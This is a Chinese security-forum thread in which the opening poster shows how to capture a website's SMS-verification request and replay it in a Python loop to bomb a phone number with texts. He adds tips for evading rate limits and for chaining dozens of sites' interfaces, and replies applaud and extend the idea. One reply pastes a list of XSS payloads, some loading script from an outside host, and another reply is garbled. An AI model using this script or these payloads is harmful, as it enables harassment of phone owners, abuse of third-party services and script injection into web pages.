用户
搜索

该用户从未签到

安全团队

Zer0 Sec(零安全团队核心)

Rank: 7Rank: 7Rank: 7

3

主题

20

帖子

38

魔法币
收听
1
粉丝
0
注册时间
2017-12-31

i春秋认证i春秋签约作者

Hacker1ee 安全团队 Zer0 Sec(零安全团队核心 i春秋认证 i春秋签约作者 楼主
发表于 2018-1-30 16:51:14 307476

大家好,我是1ee(因为在作家群,就不加Hacker这个前缀了,怕被大佬打。。)
刚加入i春秋作家组希望大家多多关照,也欢迎大家找我交流

今天我来讲讲我最近找到的一个小思路,利用python进行短信轰炸
首先
这是一个网站,他的业务存在短信发送
QQ截图20180130162121.png
这个时候,我们打开神器burp或者其他抓包工具(最好用burp,因为repeater模块可以满足我们的需要)
这时候我给我的火狐挂上代理,然后burp开启拦截
QQ截图20180130162826.png
抓到了一个包,发送到repeater
QQ截图20180130162943.png
进入repeater分析数据包
QQ截图20180130163114.png
[AppleScript] 纯文本查看 复制代码
{"mobile":"13xxxxxx","type":"signup"}

这个是发送的数据,go走起
看返回的包可以看到是成功的
QQ截图20180130163450.png

然后开始写我们的python进行循环发包对目标进行轰炸

QQ截图20180130163946.png

[Python] 纯文本查看 复制代码
import requests
import json
headers = {'User-Agent'  : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0','Cookie': 'da_a=77206194','Referer': 'http://www.de*****n.com/'}
#data =
#print data
r = requests.post('/capi/v1/dm**me/send_token',data=json.dumps({"mobile":"手机号码","type":"signup"}),headers=headers)


print(r.text)

先进行测试,测试完成后可以for循环加强脚本的威力,经过我的研究发现当一个号码多次提交后会被ban,如我一次性发了10个包后(也就是发了十条短信)之后的这个号码就不会再发了,即使返回的包状态是成功,但是短信是发不到的,其实我们可以停顿十秒再发下一个,这样就不会被ban,这也是测试知道的



好了,今天我就说道这吧,可能大家会说就一个号码我直接加入黑名单就ok了,的确,但是我们可以挖掘这类型的网站,然后一个一个接口发送一次,60个接口,一秒钟就60条短信,威力还是可以的,附上成功的图片

QQ截图20180130164813.png QQ截图20180130164840.png QQ图片20180130152427.jpg





Zero Security  Team
本帖最后由 LinkeyShell 于 2018-1-30 22:38 编辑

<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"&gt;&lt;/OBJECT&gt;
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'"--&gt;
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"&gt;
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
</xss:xss><svg/onload=alert(1)>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
<SCRIPT a=> SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
<A HREF="http://66.102.7.147/"&gt;XSS&lt;/A&gt;
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//

"><img src=M onerror=alert('XSS');>

element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>

厉害啊。学到了

使用道具 举报 回复
<details>sqlmap输出as情,有三个子节点分别a>、<dbms_versdsasion>、<dbms_vedasrsion>。最后一个是<os>sadasdas
使用道具 举报 回复
Hacker1ee 安全团队 Zer0 Sec(零安全团队核心 i春秋认证 i春秋签约作者
推荐
发表于 2018-1-31 11:48:06
naozibuhao 发表于 2018-1-31 10:56
把这个号码屏蔽了就没用了

嗯,是的,所以要收集,这样就可以实现多个号码轰炸
Zero Security  Team
使用道具 举报 回复
Hacker1ee 安全团队 Zer0 Sec(零安全团队核心 i春秋认证 i春秋签约作者
推荐
发表于 2018-1-30 18:44:10

一看就知道是昨天要收我superme的大佬
Zero Security  Team
使用道具 举报 回复
发表于 2018-1-31 16:03:32
这就是以前的短信轰炸的思路,对于这类型网站,可以提交漏洞存在短信轰炸
使用道具 举报 回复
Hacker1ee 安全团队 Zer0 Sec(零安全团队核心 i春秋认证 i春秋签约作者
推荐
发表于 2018-1-30 18:43:22
__LSA__ 发表于 2018-1-30 17:33
有的接口是不同号码发的

是啊是啊
Zero Security  Team
使用道具 举报 回复
发表于 2018-1-30 17:27:48
写个脚本帮你点击go~~  哈哈
小白~~~
使用道具 举报 回复
厉害,支持一下
使用道具 举报 回复
发表于 2018-1-30 17:32:14
黑客黑客
一位特爱收藏Supreme的大哥哥....
使用道具 举报 回复
发表于 2018-1-30 17:33:48
有的接口是不同号码发的
使用道具 举报 回复
发表于 2018-1-30 18:45:15
李哥六六六
Zer0 Sec(零安全团队)
使用道具 举报 回复
这个很黑客!!!
使用道具 举报 回复
发表于 2018-1-30 21:56:58
阔以的,自己也想写一个轰炸机来着,懒得去收集接口,就……
求知若饥,虚心若愚。
使用道具 举报 回复
本帖最后由 LinkeyShell 于 2018-1-30 22:48 编辑

厉害了,可以

使用道具 举报 回复
发表于 2018-1-31 09:12:38
思路可以啊
使用道具 举报 回复
发表于 2018-1-31 09:23:39
好东西,谢谢楼主分享,66666。
使用道具 举报 回复
发表于 2018-1-31 10:16:43
python还可以这样玩。厉害了。
使用道具 举报 回复
123下一页
发新帖
您需要登录后才可以回帖 登录 | 立即注册